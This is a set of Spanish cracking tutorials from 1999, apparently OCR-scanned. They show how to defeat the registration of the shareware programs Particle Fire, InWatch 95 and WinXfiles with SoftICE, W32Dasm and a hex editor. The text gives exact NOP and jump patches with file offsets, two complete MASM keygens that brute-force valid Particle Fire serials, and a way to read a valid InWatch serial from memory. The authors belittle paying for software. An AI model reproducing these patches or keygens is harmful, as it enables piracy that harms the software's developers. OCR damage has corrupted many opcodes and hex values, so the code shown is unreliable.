Y en una fracción de segundo ya hemos vuelto al Softice. Alguien está metiendo mano a nuestro 
serial. Vemos lo siguiente: 


OISPr00402726 MOV EAX, [00412114] 
015F:0040272B PUSH EAX 
015F:00402720 CALL 00401000 
015F:00402731 ADD ESP, 04 
015F:00402734 TEST EAX, EAX 
015F:00402736 JNZ 00402A69 


En pocas palabras, carga nuestro serial en EAX, lo envía a la pila con un PUSH y llama a algún tipo 
de rutina en la 401000... ¿quizás la que comprueba si es correcto? Vamos a seguir la rutina; vamos 
pulsando F8 (ahora si que nos interesa ver qué hace el CALL) hasta que al ejecutar el CALL, 
llegamos a una rutina que es ya la pieza clave de todo el asunto; veámosla parte a parte: 


015F:00401000 MOV EAX, [ESP+04] 

015F:00401004 PUSH ESI 

015F:00401005 CMP EAX,3B9ACA0O ; compara con 1000000000 
015F:0040100A JBE 00401049 ¿ si menor o igual, fracaso 
015F:0040100C CMP EAX, 77359400 ; compara con 2000000000 
015F:00401011 JAE 00401049 ¿ si mayor o igual, fracaso 


Esta primera parte en azul hace lo siguiente: recupera en EAX el valor de la pila (ESP+04), que como 
sabemos es nuestro serial, y a continuación comprueba que sea mayor que 3B9ACA0O (mil millones 
en decimal) y menor que 77359400 (dos mil millones en decimal). Si no es así, salta a la 401049, 
la cual huele a fracaso porque es más fácil ir a parar a ella que evitarla. No ibamos tan mal 
encaminados, ahora sabemos el rango concreto en el que se situa el serial. Claro que hay mil millones 
de números en ese intervalo, y si tenemos planes para el resto de nuestra vida, no vamos a poder 
probarlos todos. Veremos que más comprueba si el número cumple el requisito anterior. El código 
que viene ahora lo podemos ver, aunque al ir trazando con E8 no lo ejecutará (saltará a la 401049 tras 
la primera comparación) ya que nuestro serial no es MAYOR que mil millones. Si quisieramos trazar 
esta parte del código para ir mirando como cambian los registros, etc, podemos hacer una pirula; 
situarnos con el ratón en EAX y cambiar su contenido de 3B9ACAD0O (nuestro serial) a 3B9ACAO1, 
por ejemplo. Sea como sea, veamos lo que viene ahora, resaltado en rojo: 


015F:00401013 MOV ECX, EAX 
015F:00401015 MOV ESI,EAX 
015F:00401017 SHL ECXx,14 
015F:0040101A MOV EDX, EAX 
015F:00401010 SHL ESI,10 
VisESOO4OLOLE AND ECX,FFF0O0000 
015F:00401025 SHR EDX,10 
015F:00401028 OR ESI,EDX 
015F:0040102A SUB EDX, EDX 
015F:00401020 XOR ESI,ECX 
015F:0040102E MOV ECX, EAX 
015F:00401030 SHR ECXFDE 
015F:00401033 XOR ESI,ECX 
015F:00401035 MOV ECX00002694 
015F:0040103A XOR EAX,ESI 
015F:0040103C DIV ECX 
015F:0040103E TEST EDX, EDX 
015F:00401040 JNZ 00401049 
015F:00401042 MOV EAX,00000001 
015F:00401047 POP ESI 
015F:00401048 RET 

015F:00401049 XOR EAX, EAX 
015F:0040104B POP ESI 


015F:0040104C RET 


En pocas palabras: el tramo resaltado en rojo hace unas operaciones con nuestro número; el tramo 
siguiente, en blanco, determina si el número ha "pasado la prueba", y de no ser así, nos envía a la 
401049... sí, la que olía a fracaso, aquí de color gris, que es la vía de salida de los perdedores... Pero 
por suerte nosotros no somos de esos. Nos interesa recorrer todo el tramo blanco, donde vemos que 
basicamente vuelve copiando un 1 en EAX, que a mi me huele que es una especie de flag tipo 'si, 
teniente; el chico está limpio", ya que en caso contrario, lo primero que se hace en la 401049 es 
poner eax a cero con el xor eax,eax así que veamos por donde atacar... 


Lo primero que deberíamos pensar, una vez suponemos que este es el punto clave, es que todo ese lío 
en color rojo no merece que nos rompamos la cabeza; lo más fácil es parchear algo, tipicamente las 


comparaciones y/o los saltos. Es un principio del cracking elegir la vía más fácil y no calentarse la 
cabeza gratuitamente. Aunque por otra parte, también se dice que hay que ser lo más elegante 
posible, entendiendo esto como practicar la mínima intrusión al modificar el código del programa. Y 
desde luego si queremos aprender algo, habrá que hacer caso de lo que dicen los que saben del tema. 
Claro que tambien nos advierten de que en la práctica se dan casos como este, donde nos 
encontramos en una disyuntiva; lo más fácil es parchear, pero lo más elegante es generar un serial 
bueno sin tocar el programa original. En este caso, decidí que buscaría un serial correcto más por 
aprender algo que por otra cosa, pero en este tutorial desarrollaré ambas posibilidades; la de parchear 
es más apropiada para principiante, y la de analizar el código en rojo y encontrar un serial para 
amateur (requiere un poquito más de esfuerzo). Comencemos por el parcheo. 


4. Opción fácil : parchear 


Como sabeis, parchear consiste en sustituir unas intrucciones por otras; típicamente se cambian saltos 
y comparaciones por 'nops' (NOPs = no operation, o sea no hacer nada). También, en casos como 
este, podíamos haber considerado pasar de todo y 'borrar' los mensajes shareware parcheando con 
"00", pero por varios motivos no me parece una vía con futuro. El caso es que siempre hay varias 
opciones, pero en nuestro caso creo que la más simple sería parchear los 3 saltos a la 401049 con 
nops, de modo que si el número es menor que un millardo o mayor que dos, o si no cumple la 
condición que luego se aplica, en vez de saltar a la 401049, no hace nada y sigue. Con lo cual el 
código correrá sin alteraciones en su flujo hasta el final del tramo blanco. Así que ponemos code on, 
y vemos el valor de los bytes que equivalen a esas instrucciones en el fichero; la primera 
comparación es 3d00ca9a3b, el primer salto jbe es 7636, la segunda comparación es 
3d00943577, el segundo salto jae es 7336, y el último es 7507 (en realidad solo nos interesa el 
código de los saltos, pero tomamos nota de los que van antes y despues para luego asegurarnos que 
hemos encontrado el correcto). Ponemos el editor hexa, en mi caso el hiew, cargamos el fichero, 
pulsamos F4 y elegimos hex, y pulsamos F7 para buscar. Con la tecla tab saltamos al campo 'HEX' y 
tecleamos 3d00ca9%a3b763d3d00943577 (o solo 763d pero luego a ojo miramos que lo de 
antes y despues es lo que esperábamos, si no seguimos buscando). Así nos aseguramos de estar en el 
punto correcto comprobando que los códigos anteriores y posteriores coinciden con los que anotamos 
antes. El hiew nos situará al principio de la localización de la cadena de bytes hallada. Como todo 
está en la misma zona, localizando el 763d ya vemos a ojo los demás un poco más abajo. Pulsamos 
F3 para editar, y situándonos en los lugares correctos, cambiamos 763d,7336 y7507 por 9090, 
9090 y 9090 (si metemos la pata, con esc deshacemos los cambios y luego empezamos de nuevo). 
Si esta ok, pulsamos F9 para grabar los cambios en el fichero. Para hacerlo aún más fácil, ahí va una 
lista de los offset locales, el valor original de cada byte y el valor parcheado: 


File 1: File 2: 
Offset: ORIGINAL PARCHEADO 
40Ah 76h 90h 
40Bh 3Dh 90h 
411h 73h 90h 
412h 36h 90h 
440h 75h 90h 


Number of differences: 6 


(en el hiew, para cambiar entre vista de offset local y offset global, pulsa alt+f1) 


En fin, si despues de esto aún te quedan ganas, puedes buscar un crackmaker y crear tu propio crack a 
partir del fichero original (del que habrás guardado una copia) y el que acabamos de parchear. 


5. Opción no tan fácil: análisis de la rutina de chequeo del serial 
Aunque a mi que no tengo ni idea del tema me dió un poco de dolor de cabeza, solo es cuestión de 
unos minutos y paciencia descifrar el mecanismo que sigue el código que más arriba resalté en rojo. 
Si nuestro número es "+*", el programa realiza la siguiente comprobación: 


XOR [ [í XOR (OR a,b , AND c,ad) , e ] 
, donde, si "$" es igual al serial introducido: 


= shl (+,10) 
= shr (4,10) 
shl1 (4,14) 
fff00000 

= shr (%+,0c) 


00090 
Il 


Una vez calculado el churro en cuestión, llamémosle "F" al resultado, realiza otro xor: 
XOR (+,E) 


, y sobre este resultado, efectua una división (DIV) por 26 94h (la 'h' quiere decir que está en 
hexadecimal, como sabreis). Si la división tiene resto (módulo), fracaso (también conocido como 
billete de ida a la 401049). Por ejemplo, para 3B9ACAO1 (1000000001 en decimal), el resto es 
26f,o0 lo que es lo mismo, distinto de cero, o lo que es lo mismo, de cabeza a la 401049, o lo que 
es lo mismo, fracaso, chico malo, etc. 


El caso es que integrándolo todo, podemos formularlo como una ecuación. Pero ignoro si es posible 
solucionarla de modo analítico (reordenando, simplificando, despejando...), ya que para una cosa que 
s1 que sé un poco (matemáticas), me encuentro con un tipo de funciones (and, or, xor...) alas 
que no estoy acostumbrado. Caso de poderse solucionar, como que ha de tener muchas soluciones (no 
va a haber un único serial), nos quedaría en función de un valor que daríamos nosotros, en plan 
f(x)=y. Pero como digo, yo no sé solucionarlo así. De modo que la alternativa son los métodos 
numéricos (o sea, probando hasta que hallemos un número correcto - con la potencia de cálculo de un 
ordenador, sería cuestión de fracciones de segundo). Yo pretendía probarlo con el solver del Excel 
(da valores hasta encontrar una solución) pero... no puedo utilizar esas funciones porque no están 
disponibles en el Excel (alguna lo está, pero que yo sepa solo con resultados booleanos tipo 
verdadero/falso, no resultados numéricos). De modo que ya que en assembler existen están funciones, 
quizás pudiéramos programar algo... si, hombre, que nadie se asuste, yo no sé casi nada de assembler 
pero mira ahí arriba... el 90 % de nuestro keygen ya está hecho. Simplemente hemos de cambiar que, 
si el número no da resto cero tras la transformación, en vez de "echarnos", aumente una unidad al 


número inicial y pruebe de nuevo. Yo, la primera vez, hice algo muy simple; una rutina que comienza 
por 1000000000, y a partir de ahí, hace un cálculo; le suma una, le hace todo el churro de más 
arriba, y si no da el resto cero, vuelve a sumarle uno, hacer todo el churro... hasta que salga uno 
bueno. Como no sabía cómo mostrar ese número, se me ocurrió poner un messageboxa una vez 
sale del cálculo, antes de terminar el programa, para poder poner un bpx y ver que número había 
salido (hice que cada vez la rutina guardase una copia del número que prueba en EDI, porque el 
original en EAX queda 'desfigurado' por la comprobación). Así que una vez ensamblado, pongo un 
bpx messageboxa, y cuando me sale, le doy a F12 para volver a mi programa principal, y escribo 
? edi,obteniendo 1000002675 en decimal, esto es, ¡el serial del cliente número uno! (que 
honor, seguro que lo reservaban para alguien importante). El programa lo ensamblé con el mASM32; 
como digo no sé assembler más que 4 cosas, por lo cual no puedo entrar en mucha explicación sobre 
parámetros de ensamblado, etc, simplemente creé el ejecutable. Si no me equivoco, era así: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32linc1ludeXwindows.inc 
include c:imasm32lincludelkernel32.inc 
includelib c:imasm321M1liblkernel32.1lib 
include c:imasm32lincludeluser32.inc 
includelib c:imasm3211libluser32.lib 

¿ Cosas generales para ensamblar y linkar 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

MsgBoxText db "Bpx en el NOP y el resultado en EDI",0 
Serial_Start dd 3b9%aca00h 

¿ Yeservamos e inicializamos unas variables del msgbox 
; y el número de inicio (1000000000) 


. code 

start: ¿ Vamos a por ello 

Calculo: 

inc [Serial_Start] ; aumentamos en uno el número de partida 
mov eax,Serial_Start ; lo pasamos a EAX para hacer el test 

mov edi,eax ¿ pero edi guarda una copia por si sale bien 
mov ecx,eax ¿ y comienza la fiesta... 


mov esi,eax 

shl ecx,14h 

mov edx,eax 

shl esi,10h 

and ecx,O0fff00000h 
shr edx,10h 

or esi,edx 

sub edx,edx 

xor esl,ecx 

mov ecx, eax 


shr ecx,0Och 

xor esl,ecx 

mov ecx,2694h 

xor eax,esi 

div ecx 

test edx, edx 

jnz Calculo ; si no es un serial válido, prueba otra vez 

invoke MessageBoxA, NULL, addr MsgBoxText,addr MsgBoxCaption,MB_OK 
; este messagebox hace saltar el breakpoint y nos permite mirar 
¿ en EDI el último número probado, es decir el bueno 

invoke ExitProcess, NULL 

end start 


Espero que al menos se entienda la idea. Mi intención es que otros como yo le pierdan un poco el 
miedo al assembler y vean que, aunque falten conocimientos, con un poco de ingenio a veces se 
pueden solucionar los problemas. 


6. Opción no tan fácil: creación de un keygen semi-decente 


Pero como crear un key-gen, nada. Yo al final creé uno, estoy seguro que está fatal programado, que 
da pena y que quizás solo funcione en mi PC, pero me da números de registro buenos. He de decir 
que no podría haberlo creado sin la *gran* ayuda de Mr. Crimson que me proporcionó una rutina 
para convertir de hexadecimal a decimal (para poder sacar el resultado como string en un msgbox). 
Muchas gracias una vez más, Mr. Crimson. El programa también utiliza la funcion gettickcount 
para crear un número distinto cada vez, aunque no totalmente aleatorio (cada vez es mayor). No es 
perfecto ni mucho menos, pero da el pego. Para el que le interese: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32lincludelwindows.inc 
include c:imasm32lincludelkernel32.inc 
includelib c:imasm321M1liblkernel32.1lib 
include c:imasm32lincludeluser32.inc 


includelib c:imasm321Mlibluser32.lib 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

Mensaje db " = (by Champion) =",13,13," Se va 
a generar un",13," número de serie 

para",13," Particle Fire vl.la",0 


MsgBoxCaption2 db " Su número:",0 
Buffer db 10 dup(0),0 
Serial_Start dd 3b9aca00h 


. code 


start: 


invoke MessageBox, NULL, addr Mensaje,addr MsgBoxCaption,MB_OK 
invoke GetTickCount 
add [Serial_Start],eax 


Calculo: 

inc [Serial_Start] 
mov eax,Serial_Start 
mov edi,eax 

mov ecx, eax 

mov esi,eax 

shl ecx,14h 

mov edx,eax 

shl esi,10h 

and ecx,0ff£f£00000h 
shr edx,10h 

or esi,edx 

sub edx,edx 

xor esl,ecx 

mov ecx, eax 

shr ecx,0ch 

xor esl,ecx 

mov ecx,2694h 

xor eax,esi 

div ecx 

test edx,edx 

jnz Calculo 

nop 


mov eax,edi ; lo preparo para la Hex a Dec 
mov esi,ofíset Buffer 


add esi,11 
mov byte ptrlesil,00 
dec esi 


; Hex a Dec proporcionado por Mr. Crimson 
mov ecx,00000010 
c20: cmp eax,ecx 

jb c30 

xor edx,edx 

div ecx 

or dl1,30h 

mov byte ptrlesil,dl 
dec esi 

jmp c20 

c30: or al,30h 

mov byte ptrlesil,al 


invoke MessageBox, NULL, ESI,addr MsgBoxCaption2, MB_OK 
invoke ExitProcess, NULL 
end start 


7. Conclusiones finales 
Para terminar veamos a modo de resumen lo que hemos hecho: 


1. Poner bpx en regqueryvalueexa 

2. Encontrar donde lee y guarda nuestro serial 

3. Encontrar la rutina que luego lo lee y lo verifica 

4, Estudiar ese código y ser capaces de crear una clave válida 


He de decir por pen-último, que con posterioridad a todo lo explicado, me he encontrado dos patchers 
en internet para Particle Fire v1.1a, pero ningún keygen, lo cual confirma que lo más fácil es parchear 
bien y no mirar a quien. Asímismo, de los dos parcheadores, uno no funciona (al menos a mí), y el 
otro me parece que no tiene mucho estilo, porque lo que hace es dedicarse a sustituir el inicio de 
todas las cadenas de texto por '00' para evitar que salgan (si recordais, durante el tutorial hemos 
considerado esta opción pero la descarté porque es poco elegante, tediosa, y no sabes hasta que punto 
te garantiza resultados). Aún peor, ese patch sustituye *todas* las cadenas de texto, con lo cual se ha 
cargado no solo los mensajitos shareware si no también la parte de frases aleatorias que forman parte 
del salvapantallas estés registrado o no, y que pueden anularse con una simple casilla del cuadro 
'configurar protector de pantalla", con lo que más que parchear, se ha mutilado el programa 
innecesariamente. 


Ahora sí, por último, pedir disculpas si algo no ha quedado bien explicado, o por los errores que sin 
duda habré cometido, pero puedo asegurar que con este sistema me he librado de los mensajitos no 
deseados. Y, bueno, ahora ya puedo volver a mi antiguo salvapantallas con la cabeza bien alta... 


= Champion = 
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Programa: 
InWatch 95 Relase V1.3a 


PROTECCION: Name / Serial 

Descripcion: Programa Para Monitorear el systema, bueno para comprobar los cambios que hacen los 
programas al instalarlos. 

Dificultad: Facilon 

DOWNLOAD : http://members.xoom.com/ XOOM/kf karpoff/Utilidades/Installw.zip 

Herramientas: Softice v3x+, W32Dasm , Editor Hexadecimal 


CRACKER: karpoff FECHA: 11/09/99 


| INTRODUCCION 


HH Tutoríal de Crackeo Para Newbies desde Cero 11/09/99 


Por Karpoff it PROYECTO 9 ¿Hit 


Hola a todos/as !!! Lo primero decir que esto no va ha ser un manual como los 
anteriores, voy a intentar demostraros el poco interés que ponen la mayoría de los 
programadores en proteger su software, y por lo tanto la mierda de software que nos 
quieren meter. Conocéis alguna utilidad con licencia shareware que merezca la pena 
pagar¿? Yo realmente no. 


Siempre que queremos petar un programa los newbies (novatos) pensamos que tiene que 
ser super complicado encontrar el punto donde atacar al programa, generalmente 
queremos petarlo antes de empezar, con lo cual se nos cierra el cerebro y no vemos 
mas halla de nuestra totxa, os aseguro que si os tomáis las cosas con calma y probáis 
a modificar en un programa todo lo que creáis que os puede beneficiar en cuanto a la 
limitación se refiere, podéis flipar, a parte de aprender muchisimo os divertiréis 
viendo como puede llegar a actuar el programa que modifiquéis. 


La víctima InWatch 95 Relase Vl1l.3a parece ser una utilidad para seguir instalaciones, 
pudiendo ver todo lo que se modifico con una instalación tal, y recuperando el estado 
anterior a la instalación. Parece que tiene funciones de editor y algunas cosas mas, ( 
el caso es que no conocía este programa y no he tenido la ocasión de probarlo). Lo 
podéis coger de: 


http: //members.xoom.com/_XOOM/nakarko/inversa/proggies/Installw.zip 


Este es un programa limitado a 30 días, nos arranca con un nag para decirnos que es 
una versión sin registrar y una vez aceptado nos muestra un nuevo nag soltándonos 
otra vez el rollo de su limitación a 30 días. 


Ataques: vamos a sacar con el SoftlIce un numero de registro valido para el nombre que 
metamos, el proceso que voy a utilizar para capturar el S/N no es corriente, se trata 
de que sepáis que se puede crackear sin seguir el típico proceso de buscar la rutina 
de comprobación y a partir de hay comparar el reg falso con el valido. 


Os explico como lo haremos, se trata únicamente de buscar en la memoria el n/s 
valido, porque cuando un programa nos da el mensaje de qu l serial no es valido, en 
ese momento todavía puede estar el reg valido en la memoria, claro esta que para 
mostrar el mensaje de error en algún punto hizo la comprobación, entonces 
rastrearemos la memoria en la ventana de datos del softice en busca del posible n/s. 
este es un método un poco pasota pero os aseguro que con muy buenos resultados, Y con 
el W32dasm convertiremos la ventana donde tenemos que escribir el nombre y el numero 
de registro en un generador de S/N validos, Ósea que meteremos un nombre cualquiera y 
sin meter n/s pulsaremos el botón que era para registrarnos, y nos mostrara el numero 
valido, curioso no¿? 


| AL ATAKE 


PARTE 1 BUSCAR UN S/N VALIDO, DE UNA FORMA POCO USUAL 


Herramientas Softice, W32dasm, HEXedit, primero empezamos con el soft, ousease que hemos 
reiniciado nuestro ordenador y hemos cargado el sofice. Bien primero hacer una copia del 
archivo inwatch.exe para luego editarla con el hexedit, ahora cargamos el original con el 
softice, pulsamos el botón de los engranajes y nos baos al soft, F5 para vover a windows, 
aparece el primer nag, pulsamos OK y aparece el segundo nag pulsamaos OK y entramos en el 
programa vamos a register y pulsamos register now, y ya nos aparece la ventana de registro ( 
que luego la convertiremos en el generador de n/s validos) rellenamos los datos en mi caso 
pondré 


NAME: karpoff 


Regitration Number : 1212121212 


Y ahora tenemos que poner un breakpoint que detenga la ejecución del programa Justo cuando 
este, O aya comparado nuestro numero con el valido, que breakPoint poner¿? En anteriores 
manuales ya explique como saber a que funciones externas llama un programa, en este caso 
utilizamos la función messageboxexa, pues pulsamos [Ctrl+D] para entrar en el softice y 
poner nuestro breakpoint 


BPX messageboxexa 


Pulsamos nuevamente [Ctrl+D] para volver a Windows y pulsamos OK en la ventana del registro, 
inmediatamente el programa llama a la función messageboxexa e interrumpe la ejecución del 
programa llevándonos directamente al softice exactamente en 


USER32 MESSAGEBOXEXA 


015F:BFF52E1C B135 MOV CL,35 


Lógicamente estamos dentro de user32.dll y necesitamos saber quien llamo a esta funcion 
desde inwatch.exe pues nada mas fácil pulsamos F12 y no nos muestra a papa (la rutina padre 
que llamo a messageboxexa) nos saca del softice a windows y nos muestra el mensage de que no 
es correcto nuestro numero, aquí es donde podemos empezar a soñar e imaginar y pensar con 
mucha paz y ciencia, bueno como decía esto ya ha hecho la comprobación y ha decidido que 
somos unos chicos/as malos/as, pero seamos aun peores, lo ultimo que hicimos en el softice 


fue pulsar la tecla F12 para que nos llevase a la rutina padre que había llamado a 
messageboxexa y nos saco a Windows, bueno pues en cuanto pulsemos aceptar en el mensaje de 
error iremos a parar a la rutina padre ya que esa orden todavía no se ha terminado de 
ejecutar en el softice Pulsemos aceptar y entramos al soft en 


:0042B5B2 E8891B0300 Call USER32!!MESSAGEBOXEXA --- LA RUTINA PADRE 


:0042B5B7 57 push edi --- APARECEMOS AQUÍ 


Bueno pues yo sigo pensando que el numero correcto todavía debe de estar en memoria, si 
pulsamos la tecla F2 veréis que en la parte superior del softice nos aparece un nuevo 
apartado con los registros y los valores que llevan actualmente algo así 


EAX=XXXXXXXX ESI=XXXXXXXX ECX=XXXXXXXXX ETC. ETC. ETC. 


Si pulsamos con el botón derecho del ratón sobre cualquier registro (EAX, EDX, EBX, ECX,ESI, 
EDI ETC.) o sobre cualquier dato que veáis se despliega un menú y si escogéis la opción 
DISPLAY veréis que en la ventana de datos ( en la que se muestran los caracteres) se muestra 
lo que lleva la memoria en ese momento, mi idea es ir pulsando en cada registro y rastrear 
la ventana de datos hacia arriba y abajo, Y concretamente si pulsáis sobre ESP y le hacéis 
DISPLAY podéis ver en la ventana de datos y concretamente en la parte superior izquierda el 
numero 15757 claro veréis este numero si como nombre escribisteis karpoff, de haber escrito 
otro nombre veréis otro numero con cinco dígitos, seguramente en otros registros(EDX, EBP, ) 
también encontréis el n/s valido, solo que tendréis que rastrear arriba y abajo no siempre 
aparece a la primera, y en muchos programas este método no será valido.Bueno Pues este era 
nuestro n/s valido, queda entendido no ¿? hay muchas formas de crackear, la limitación la 
ponemos nosotros, echarle imaginación y veréis. 


Los datos del registro se guardan en el archivo C:IWINDOWSX inwatch.INI para hacer el 
siguiente experimento tenéis que desregistraros, con borrar el n/s del archivo inwatch.ini 
ya no estaréis registrados. 


PARTE 2 Convertir la ventana de registro en un generador de S/N validos 


Pues si con una pequeña modificación en solo dos bytes, haremos que la ventana donde metemos 
el nombre y el s/n para registrarnos se convierta en un generador de números validos para el 
programa (curioso no¿?) 


Bueno utilizaremos el W32dasm y un editor HEX, desensamblamos el archivo inwatch.exe y con 
el HEXedit editamos una copia de este mismo archivo, ya hemos desensamblado el archivo, 
sigamos los pasos tipicos buscamos el mensaje de * Incorrect Registration Number." Y hacemos 
doble clip, aparecemos en 


* Possible StringData Ref from Data Obj ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Obj ->"Incorrect Registration Number." 


:0042B5AB 682CFA4600 push 0046FA2C -— APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 


echemos un vistazo encima de este código para ver que hace que se imprima este mensaje. 


* Possible StringData Ref from Data Obj ->"shownumber" 


:0042B55F 680DFA4600 push 0046FAOD 


:0042B564 FF75F0 push [ebp-10] 


:0042B567 E8B4900200 call 00454620 


:0042B56C 83C408 add esp, 00000008 


:0042B56F 85C0 test eax, eax 


:0042B571 742A Je 0042B59D — SI NO SALTA GENERA EL S/N 


:0042B573 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Registration Number" 


:0042B575 6818FA4600 push 0046FA18 


:0042B57A 8D45CC lea eax, dword ptr [ebp-34] 


:0042B57D 50 push eax 


:0042B57E FF37 push dword ptr [edi] 


:0042B580 E87C4E0100 call 00440401 


:0042B585 83C410 add esp, 00000010 


:0042B588 FF7720 push [edi+20] 


:0042B58B 8B4720 mov eax, dword ptr [edi+20] 


:0042B58E 8B4008 mov eax, dword ptr [eax+08] 


:0042B591 FF908C000000 call dword ptr [eax+0000008C] 


:0042B597 59 pop ecx 


:0042B598 E9A5000000 jmp 0042B642 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0042B571 (C) 


:0042B59D 3B5DEC cmp ebx, dword ptr [ebp-14] 


:0042B5A0 741E je 0042B5C0 -— SALTO AL MENSAJEE DE ERROR 


:0042B5A2 6A00 push 00000000 


:0042B5A4 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Incorrect Registration" 


:0042B5A6 6841FB4600 push 0046FB41 


* Possible StringData Ref from Data Obj ->"Incorrect Registration Number." 


:0042B5AB 682CFA4600 push 0046FA2C —- APARECEMOS AQUI 


:0042B5B0 6A00 push 00000000 
Bueno ya veis no¿? No voy a enrroyarme, mas bien resumiré, tenemos un salto en 


0042B5A0 si este salto se ejecuta evitaría el mensaje de error, por lo tanto nos registraría 
cualquier numero, para ello tendríamos que cambiar 


0042B5A0 741E je 0042B5C0 por 0042B5A0 EB1E jmp 0042B5C0 


EN realidad esto nos aceptaría el s/n que metamos, incluso nos felicita con el típico Tank 
you for register o similar, pero al iniciar nuevamente el programa vemos que no mantiene el 
registro, que puede pasar, pues que hay otra comprobación o la misma pero llamado desde otro 
punto del programa, en cualquier caso no me centrare en buscarla eso os lo dejo a vosotros 
que esta muy fácil. 


Sigamos en 0042B571 742A je 0042B59D otro salto si os fijáis en la dirección de memoria a la 
que apunta vemos que si salta va directo al salto que hemos analizado antes , pero si lo 
eliminamos haciendo que no salte entra en el código que genera el s/n valido, y cual fue mi 
sorpresa al ver que si eliminas el salto convierte la ventana de registro en un keygen, 
actuando así, metemos un nombre pulsamos ok y en vez de mostrarnos el nag con el aviso de 
registro aceptado o registro fallido nos muestra un nag diciendo su numero de registro es 
tal ( alucinante, nunca vi un programa con este comportamiento) bueno para eliminar el salto 
0042B571 742A Je 0042B59D tendríamos que cambiar los bytes 742A por 9090 solo tenemos que 
ver la dirección del offset e ir al HEXedit Offset 1BB71 cuando realizeis los cambios salvar 
el programa ( que es una copia del original claro) y veréis cuando intentéis registraros.... 


Espero que lo entendáis todo, no me he querido meter en explicaciones profundas por dos 
razones, una por que ya debéis de tener nivel suficiente para llevar a cavo todos estos 
cambios sin las explicaciones detalladas de los anteriores manuales, y dos porque en este 
manual lo que intento es deciros que cualquier forma de crackeo es valida, todo lo que se os 
ocurra vale no os centréis solo en los manuales, buscar nuevos métodos de ataque. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf_karpofffhotmail.com URL: http://welcome.to/karpoff 


Un Saludo a TODOS/AS. (Karpoff) 


Este material es solo para uso educativo, por ahora los cracks son ilegales. 


sobre 
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Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


HH Tutoríal de Crackeo Para Newbies desde Cero 22/09/99 


Por Karpoff Hi GRUPO KF_CRACK KARPOFF-NEW 98/99 HH 


PROYECTO 12 HH 


INTRODUCCION. 


Hello Nuevamente ¡! Tan solo han pasado 2 dias desde el manual n*11, pero este va ha ser un 
manual cortito, quiero que conozcáis una herramienta que muchos no conoceréis, se trata de 
APIS32 V 2.4. Esta herramienta nos puede mostrar las apis que maneja un programa en cada 
momento, ejemplo: estamos con ele SoftlIce intentando sacar el S/N valido de un programa 
pero no encontramos el breakPoint apropiado, que nos capture el proceso de creación y 
comparación del S/N, pues el APIS32 nos puede ayudar, os diré como a la vez que sacamos un 
S/N valido de la ultima versión de WinXfiles V2.4 ( es tan nueva que solo tiene 4 días ) 
este programa es para encriptar todo tipo de archivos, imágenes etc. 


Podéis encontrar APIS32 V 2.4 en mi Web en la sección herramientas, Editores HEX € Utiles 
http://welcome.to/karpoff 


Parte 1 


Este programa WinXfiles hace 3 versiones era tan fácil de crackear como desemsamblarlo y 
parchear un salto, (solo faltaba que en el readme del programa te dijesen donde encontrar 
el je a partchear, creerme que era facilísimo) hoy cuenta con algunas protecciones, el 
código fuente a cambiado, si modificas el programa este se cierra automáticamente, y 
algunas cosillas mas haciendo muy difícil petarlo con listado muerto. 


Lo podéis coger de: 


http://www.pepsoft .com/wxf32 42.zip 


ftp: //ftp.cix.co.uk/mirrors/tucows.com/files3/wxf32 42.zip 


Herramientas: Softlce y APIS32 V 2.4 , Cuento con que tenéis bien configurado el SoftlIce ya 
que en este manual no voy a dar ninguna explicación sobre el tema. 


Comportamiento del programa Tenemos 30 días de evaluación pasado ese tiempo deja de 
funcionar, desconozco si tiene algún tipo de limitación, no muestra ningún nag de arranque, 
tenemos la opción de registrar el programa, si metemos los datos al azar nos saldrá un nag 
diciendo Sorry this number is invalid o algo así, este nag no es del tipo de messageboxa es 
un nag que mas bien parece un icono grande, no emite ningún beep con lo cual nos dificulta 
mas el capturar el proceso mediante el nag. 


Ataque Localizar un S/N valido dependiendo del nombre que metamos, localizaremos el numero 
rastreando los registros ( eax, eilp, ebx etc), ya que el S/N se genera según nuestro nombre 
y en un momento dado se compara con el nuestro, pero mientras ocurren todos etos procesos 
el S/N valido esta en alguna parte de la memoria puesto que ya se ha generado o se esta 
generando, rastrearemos los registros sin liarnos demasido si no encontramos lo que 
queremos enseguida, pasamos a tracear el programa y a ver todo el proceso. Como ya os dije 
en manuales anteriores no tenemos por que seguir unas pautas de crackeo, sino que todo lo 
que se nos pueda ocurrir es perfecto. 


PARTE 2 


A trabajar. Tenemos iniciado Windows con Softlce y APIS32 V 2.4 ya en funcionamiento, el 
aspecto de APIS32 V 2.4 es este. 


ADVAPI32: RegUpenkewá [ HANDLE. LPSTR. LPDATA ] 

ADVAPI32: RegOpenKeyExá [ HANDLE, LPSTR, DWORD, DWORD, LPDATA ] 
ADVAPI32 : RegOpenKeyExw' [ HANDLE, LPWSTR, DWORD, DWORD, LPDATA ] 
ADWAPI32 : RegOpenKeyw [ HANDLE, LPWSTA, LPDATA ] 


: _hread [ HANDLE, LPDATA, DWDRD ] 
: _hwrite [ HANDLE, LPSTR, DW'DRD ] 
¿_lclose [ HANDLE ] 
: _lereat [LPSTR, DWDRD ] 
: _liseek [ HANDLE, DWORD, DWORD ] 

:_lopen (LPSTR, DWORD ] 

: _lread [ HANDLE, LPDA4TA, DWDRD ] 

: _lwrite [ HANDLE, LPSTR, DWORD ] 
KERNEL32: CreateFileá, [LPSTR, DWORD, DWORD, LPDATA, DWDRD, DWORD, HAN 
KERNEL32: CreateFileMappingá [ HANDLE, LPDATA, DWORD, DWORD, DWORD, LPS 
KERNEL32: CreateFilew' [ LPwWSTAR, DWORD, DWORD, LPDA4TA, DWORD, DWORD, H 
KERNEL32 : CreateMailslotá [ LPSTR, DWORD, DWORD, LPDATA ] 


Examining application --- Escoger el programa que vamos a analizar 
Command line arguments --- por si queremos ejecutar el programa con alguna opción 
Follow API functions are spied --- Esta es la lista de funciones Api que nos detectaría en 


el programa a analizar, podemos añadir mas. 


Find ---- Buscar una Función en la lista 


